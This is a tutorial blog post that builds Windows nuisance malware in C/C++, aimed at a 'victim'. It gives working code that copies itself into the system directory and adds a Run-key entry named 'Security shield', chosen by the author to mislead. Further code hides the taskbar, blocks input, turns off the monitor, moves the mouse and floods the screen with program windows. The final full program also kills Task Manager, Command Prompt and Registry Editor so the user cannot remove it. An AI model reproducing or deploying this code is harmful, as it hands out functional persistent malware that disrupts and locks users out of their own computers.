Annoying malware


Hi guys

Welcome back :)

NOTE:

Making malware is not always about destruction. It's no fun at all to wreck someone's machine. So let's just play with our victim instead :).

We have seen how to make a MsgBox; now, how do we put our executable in a specific place?

#include <windows.h>
#include <string.h>

int WINAPI WinMain(HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
                   LPSTR lpszArgument, int nCmdShow)
{
    char system[MAX_PATH];       /* the system directory, e.g. C:\Windows\System32 */
    char pathtofile[MAX_PATH];   /* full path of the executable we are running from */
    HMODULE GetModH = GetModuleHandleA(NULL);   /* NULL = the running .exe itself */

    GetModuleFileNameA(GetModH, pathtofile, sizeof(pathtofile));
    GetSystemDirectoryA(system, sizeof(system));

    strcat(system, "\\MsgBox.exe");   /* destination: <systemdir>\MsgBox.exe */

    CopyFileA(pathtofile, system, FALSE);   /* FALSE: overwrite if it already exists */

    MessageBoxA(NULL, "Hello From Nakerah", "Nakerah NG", MB_OK);
    return 0;
}

Now compile and run.

Explanation time:
First we defined system[MAX_PATH], a buffer to hold the system directory, then pathtofile[MAX_PATH], a buffer to hold the path of our own executable, the file we are about to copy. GetModuleHandleA(NULL) returns the module handle of the running executable.

GetModuleFileNameA() retrieves the full path of the file a given module was loaded from; with the handle from above, that is our own .exe.
GetSystemDirectoryA() asks Windows where the system directory is instead of assuming it, because it is not guaranteed to be C:\Windows\System32 on every machine (mine is C:\Windows\System32). One caveat: on 64-bit Windows a 32-bit program that writes into System32 is silently redirected to SysWOW64 by the WOW64 file system redirector, so look there if you cannot find the copy.
strcat() appends the source string to the destination string, so our system buffer now holds "C:\Windows\System32\MsgBox.exe". Note the '\\' is doubled. That is not a typo: in a C string literal the backslash is the escape character, so "\\" produces a single '\'. Also note that strcat() does no bounds checking; it is fine for this short name, but a long one would overrun the MAX_PATH buffer.
CopyFile() does what its name says and places our executable where we want it. The FALSE argument means "overwrite the file if it already exists" (TRUE would make the call fail instead). Copying into the system directory requires administrator rights; on Vista and later, run the program elevated or CopyFile fails with ERROR_ACCESS_DENIED. None of the calls above check their return values, so you only notice a failure when the file is missing.
Compile your code, double-click the file, and you should see a MsgBox.

So now we can replace the MsgBox with something more interesting.

We are going to use 3 APIs:

HKEY hKey;

RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
              0, KEY_SET_VALUE, &hKey);

/* data is the path in the system buffer from above; size = string + terminator */
RegSetValueExA(hKey, "Security shield", 0, REG_SZ,
               (const unsigned char*)system, (DWORD)(strlen(system) + 1));

RegCloseKey(hKey);

HKEY hKey is the handle the registry calls work with. First, we open the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, whose values are started at logon for all users, which is what we want. Writing to it needs administrator rights; HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run can be written without elevation, but only starts the program for the current user. The 0 is reserved and must stay 0. KEY_SET_VALUE is the access we ask for, and &hKey receives the opened handle. RegSetValueExA takes that handle; the value name is what shows up in the Run key (and in the Startup list of msconfig or Task Manager), so I chose "Security shield" to mislead. The next 0 is reserved again, REG_SZ is the value type (a NUL-terminated string), the (const unsigned char*) cast is needed because the data parameter is a const BYTE* to raw bytes, and the last argument is the size of the data in bytes. That size should be strlen(system) + 1, the string plus its terminator; sizeof(system) would pass the whole 260-byte buffer, so whatever uninitialised bytes follow the terminator end up stored in the registry as well. Finally, we close the handle with RegCloseKey. All three calls return ERROR_SUCCESS (0) when they succeed; check it, because an access-denied write simply leaves no entry behind.
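The copy-and-persist step from the two snippets above, written out as an added example that is not part of the original post: the destination path is built with a bounds check instead of a bare strcat(), every call's result is checked, the REG_SZ size is the string length plus terminator, and a --remove switch undoes the change so a test VM can be cleaned up. The file name MsgBox.exe and the value name "Security shield" are the post's; join_path, reg_sz_bytes, install_run_entry and remove_run_entry are my names. The path helpers are plain C and build anywhere; the Win32 part is compiled only on Windows (the registry calls live in advapi32.dll, so add -ladvapi32 if your linker does not pull it in).

```c
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Build "<dir>\<name>" into out (outsz bytes). Returns 0 on success and -1
 * when the result would not fit, where an unchecked strcat() would overrun. */
int join_path(const char *dir, const char *name, char *out, size_t outsz)
{
    size_t dlen = strlen(dir);
    int need_sep = (dlen > 0 && dir[dlen - 1] != '\\');
    size_t need = dlen + (need_sep ? 1 : 0) + strlen(name) + 1;  /* + NUL */

    if (need > outsz)
        return -1;
    memcpy(out, dir, dlen);
    if (need_sep)
        out[dlen++] = '\\';
    strcpy(out + dlen, name);
    return 0;
}

/* Byte count for a REG_SZ value: the string plus its terminator. Passing
 * sizeof(buffer) instead would also store the stack bytes after the NUL. */
unsigned long reg_sz_bytes(const char *s)
{
    return (unsigned long)(strlen(s) + 1);
}

#ifdef _WIN32
/* Copy the running .exe to <systemdir>\<name> and register that path as
 * value_name under root\Software\...\Run. Returns 0 on success; otherwise
 * reports the failing step and the Win32 error (5 = ERROR_ACCESS_DENIED). */
int install_run_entry(HKEY root, const char *name, const char *value_name)
{
    char self[MAX_PATH], sysdir[MAX_PATH], dest[MAX_PATH];
    HKEY hKey;
    LONG rc;

    if (GetModuleFileNameA(NULL, self, sizeof(self)) == 0 ||
        GetSystemDirectoryA(sysdir, sizeof(sysdir)) == 0) {
        printf("path lookup failed: %lu\n", GetLastError());
        return -1;
    }
    if (join_path(sysdir, name, dest, sizeof(dest)) != 0) {
        printf("destination path too long\n");
        return -1;
    }
    if (!CopyFileA(self, dest, FALSE)) {   /* System32 needs an elevated token */
        printf("CopyFile to %s failed: %lu\n", dest, GetLastError());
        return -1;
    }
    rc = RegOpenKeyExA(root, "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                       0, KEY_SET_VALUE, &hKey);
    if (rc != ERROR_SUCCESS) {
        printf("RegOpenKeyEx failed: %ld\n", rc);
        return -1;
    }
    rc = RegSetValueExA(hKey, value_name, 0, REG_SZ,
                        (const BYTE *)dest, reg_sz_bytes(dest));
    RegCloseKey(hKey);
    if (rc != ERROR_SUCCESS) {
        printf("RegSetValueEx failed: %ld\n", rc);
        return -1;
    }
    return 0;
}

/* Undo: delete the Run value and the copied file. */
int remove_run_entry(HKEY root, const char *name, const char *value_name)
{
    char sysdir[MAX_PATH], dest[MAX_PATH];
    HKEY hKey;
    int ok = 1;

    if (RegOpenKeyExA(root, "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                      0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
        ok &= (RegDeleteValueA(hKey, value_name) == ERROR_SUCCESS);
        RegCloseKey(hKey);
    } else {
        ok = 0;
    }
    if (GetSystemDirectoryA(sysdir, sizeof(sysdir)) == 0 ||
        join_path(sysdir, name, dest, sizeof(dest)) != 0 || !DeleteFileA(dest))
        ok = 0;
    return ok ? 0 : -1;
}

int main(int argc, char **argv)
{
    /* HKLM\...\Run starts the entry for every user but needs admin rights;
     * HKEY_CURRENT_USER works unelevated and starts it for this user only. */
    HKEY root = HKEY_LOCAL_MACHINE;
    if (argc > 1 && strcmp(argv[1], "--remove") == 0)
        return remove_run_entry(root, "MsgBox.exe", "Security shield") == 0 ? 0 : 1;
    return install_run_entry(root, "MsgBox.exe", "Security shield") == 0 ? 0 : 1;
}
#endif
```

Run it once from an elevated prompt to install and with --remove to undo. Unelevated, it stops at the CopyFile step with error 5 rather than silently doing nothing, which is the difference between this and the unchecked version above.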

Now let’s add our annoying part.

#include <windows.h>
#include <string.h>

int WINAPI WinMain(HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
                   LPSTR lpszArgument, int nCmdShow)
{
    char system[MAX_PATH];
    char pathtofile[MAX_PATH];
    HMODULE GetModH = GetModuleHandleA(NULL);

    GetModuleFileNameA(GetModH, pathtofile, sizeof(pathtofile));
    GetSystemDirectoryA(system, sizeof(system));

    strcat(system, "\\annoyingMalware.exe");

    CopyFileA(pathtofile, system, FALSE);   /* needs admin rights for the system directory */

    HKEY hKey;

    RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                  0, KEY_SET_VALUE, &hKey);

    RegSetValueExA(hKey, "Security shield", 0, REG_SZ,
                   (const unsigned char*)system, (DWORD)(strlen(system) + 1));

    RegCloseKey(hKey);

    HWND hWin;

    hWin = FindWindowA("Shell_TrayWnd", NULL);   /* window handle of the taskbar, found by class name */
    EnableWindow(hWin, FALSE);                   /* the taskbar stops reacting to clicks */

    while (1)
    {
        ShowWindow(hWin, SW_HIDE);   /* Sleep() counts milliseconds: hidden for one second ... */
        Sleep(1000);
        ShowWindow(hWin, SW_SHOW);   /* ... shown for one second, forever */
        Sleep(1000);
    }
    return 0;
}

Although it's a small one, don't underestimate it. Sleep() takes milliseconds, so the taskbar disappears and reappears every second, and the EnableWindow() call keeps it from reacting to clicks in between. How to fix this? Press Ctrl+Shift+Esc (or Ctrl+Alt+Delete) to open Task Manager, end annoyingMalware.exe, then end explorer.exe and start it again from Task Manager's File menu so Explorer recreates the taskbar window. Because of the Run key entry it comes back at the next logon, so also delete the "Security shield" value and the copy in the system directory.

It doesn't make sense to let the victim fix what we have ruined, so we want to stop him, but how?
Well, can we stop him from opening Task Manager? Obviously yes; as long as it's code, there is nothing we can't do :)

Destroying Task Manager and other Windows.

Now, this is easy to understand. To find the Task Manager window, or any other window, all you have to do is call FindWindowA() with the window title. One caveat: the title depends on the Windows version. It is "Windows Task Manager" on XP, Vista and 7 and just "Task Manager" on Windows 8 and later, and both follow the UI language, so check for the title your target actually shows.

HWND TaskMgr;
TaskMgr = FindWindowA(NULL, "Windows Task Manager");   /* "Task Manager" on Windows 8 and later */

Again, what do we want to do? Right, we don't want our victim to be able to open Task Manager. An easy way: check whether it is open and, if it is, close it. Simple, right?

We can do that with PostMessageA(), which puts a message, WM_CLOSE in our case, into the window's message queue; the window closes when it processes it, exactly as if its close button had been clicked.

if (TaskMgr != NULL)
{
    /* wParam comes before lParam; both are unused for WM_CLOSE */
    PostMessageA(TaskMgr, WM_CLOSE, (WPARAM)0, (LPARAM)0);
}

But we can do more. We can block user input with the BlockInput() function, so he can't move his mouse or type anything. Two caveats: on Vista and later the call only succeeds from an elevated process, and Windows always unblocks input when the user presses Ctrl+Alt+Del.

{
    BlockInput(TRUE);    /* blocked until BlockInput(FALSE), the blocking thread exits, or Ctrl+Alt+Del */
}

We can also control his monitor with SendMessage(). SendMessage() and PostMessageA() deliver the same messages, but there is a real difference: SendMessage() is synchronous, it calls the window procedure and waits for it to return, while PostMessage() queues the message and returns immediately. With HWND_BROADCAST that matters, because SendMessage() waits on every top-level window, so one hung window hangs us too; PostMessage() doesn't. For SC_MONITORPOWER the LPARAM is 2 for off, 1 for low power and -1 for on.

SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM)2);    /* monitor off */
Sleep(5000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM)-1);   /* monitor on again */

We can also play with his mouse using SetCursorPos(), moving the cursor to random positions:

int X, Y;
while (1)
{
    X = rand() % GetSystemMetrics(SM_CXSCREEN);   /* screen size instead of a hard-coded 800x600 */
    Y = rand() % GetSystemMetrics(SM_CYSCREEN);
    SetCursorPos(X, Y);
    Sleep(10);
}

Well, what else can we do? :) Let's start a process.

We can do that with ShellExecuteA(). For example, starting Notepad:

#include <windows.h>

int WINAPI WinMain(HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
                   LPSTR lpszArgument, int nCmdShow)
{
    char Notepad[MAX_PATH] = "notepad.exe";
    ShellExecuteA(NULL, "open", Notepad, NULL, NULL, SW_SHOWNORMAL);   /* found via PATH */
    return 0;
}

Compile and run. So we can start any program that exists on the machine, and ShellExecute() with "open" also opens a URL in the default browser. COOL :) Now I'll let you figure out what this one does :3.

#include <iostream>
#include <cstdio>
#include <cstring>
#include <cstdlib>
#include <ctime>
#include <windows.h>
#include <winable.h>   // MinGW/Dev-C++ header that declares BlockInput(); MSVC gets it from windows.h
#include <conio.h>
using namespace std;

int random, Freq, Dur, X, Y;
HWND mywindow, TaskMgr, CMD, Regedit;
char Notepad[MAX_PATH] = "notepad.exe";
char MineSweeper[MAX_PATH] = "winmine.exe";   // XP-era games, not present on later Windows
char Hearts[MAX_PATH] = "mshearts.exe";
char Website[MAX_PATH] = "http://www.google.com";   // forward slashes, or it is treated as a file path

void SetUp();
void Run(int ID);
void Beeper(), OpenStuff(), Hibernation(), CrazyMouse();

DWORD WINAPI DestroyWindows(LPVOID);

int main()
{
    srand((unsigned)time(0));
    random = rand() % 6;          // 0..5, chosen once: the same behaviour for the whole run
    system("title :.Virus.:");    // console title, so SetUp() can find our own window
    BlockInput(true);             // only succeeds from an elevated process
    SetUp();
    BlockInput(false);
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
    while (1)
    {
        Run(random);
        Sleep(10);
    }
}

void SetUp()
{
    char system[MAX_PATH];
    char pathtofile[MAX_PATH];
    HMODULE GetModH = GetModuleHandle(NULL);
    GetModuleFileName(GetModH, pathtofile, sizeof(pathtofile));
    GetSystemDirectory(system, sizeof(system));
    strcat(system, "\\winminer.exe");
    CopyFile(pathtofile, system, false);   // needs admin rights for the system directory

    HKEY hKey;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                 0, KEY_SET_VALUE, &hKey);
    RegSetValueEx(hKey, "SetUp", 0, REG_SZ,
                  (const unsigned char*)system, (DWORD)(strlen(system) + 1));   // string + terminator
    RegCloseKey(hKey);

    mywindow = FindWindow(NULL, ":.Virus.:");
    cout << "You Are under attack";
    Sleep(1000);
    ShowWindow(mywindow, SW_HIDE);   // hide our own console window
}

void Run(int ID)
{
    if (ID == 1)
    {
        BlockInput(true);
    }
    else if (ID == 2)
    {
        Beeper();
    }
    else if (ID == 3)
    {
        OpenStuff();
    }
    else if (ID == 4)
    {
        Hibernation();
    }
    else if (ID == 5)
    {
        CrazyMouse();
    }
    else   // ID == 0: everything at once
    {
        BlockInput(true);
        Beeper();
        OpenStuff();
        CrazyMouse();
    }
}

void Beeper()
{
    Freq = 37 + rand() % 1964;   // Beep() only accepts 37..32767 Hz; this gives 37..2000
    Dur = rand() % 301;          // 0..300 ms
    Beep(Freq, Dur);
}

void OpenStuff()
{
    // called every 10 ms while ID == 3, so expect a flood of windows
    ShellExecute(NULL, "open", Notepad, NULL, NULL, SW_MAXIMIZE);
    ShellExecute(NULL, "open", MineSweeper, NULL, NULL, SW_MAXIMIZE);
    ShellExecute(NULL, "open", Hearts, NULL, NULL, SW_MAXIMIZE);
    ShellExecute(NULL, "open", Website, NULL, NULL, SW_MAXIMIZE);   // a URL opens in the default browser
}

void Hibernation()
{
    // despite the name this only switches the monitor off (2); -1 would switch it back on
    Sleep(1000);
    SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM)2);
}

void CrazyMouse()
{
    X = rand() % GetSystemMetrics(SM_CXSCREEN);   // screen size instead of a hard-coded 800x600
    Y = rand() % GetSystemMetrics(SM_CYSCREEN);
    SetCursorPos(X, Y);
}

DWORD WINAPI DestroyWindows(LPVOID)
{
    while (1)
    {
        TaskMgr = FindWindow(NULL, "Windows Task Manager");   // XP/Vista/7 title
        if (TaskMgr == NULL)
            TaskMgr = FindWindow(NULL, "Task Manager");       // Windows 8 and later
        CMD = FindWindow(NULL, "Command Prompt");             // only cmd windows with exactly that title
        Regedit = FindWindow(NULL, "Registry Editor");
        if (TaskMgr != NULL)
        {
            SetWindowText(TaskMgr, "You Are Hacked");
            PostMessage(TaskMgr, WM_CLOSE, (WPARAM)0, (LPARAM)0);
        }
        if (CMD != NULL)
        {
            SetWindowText(CMD, "You Are Hacked");
            PostMessage(CMD, WM_CLOSE, (WPARAM)0, (LPARAM)0);
        }
        if (Regedit != NULL)
        {
            SetWindowText(Regedit, "You Are Hacked");
            PostMessage(Regedit, WM_CLOSE, (WPARAM)0, (LPARAM)0);
        }

        Sleep(10);
    }
}

That’s enough for today :).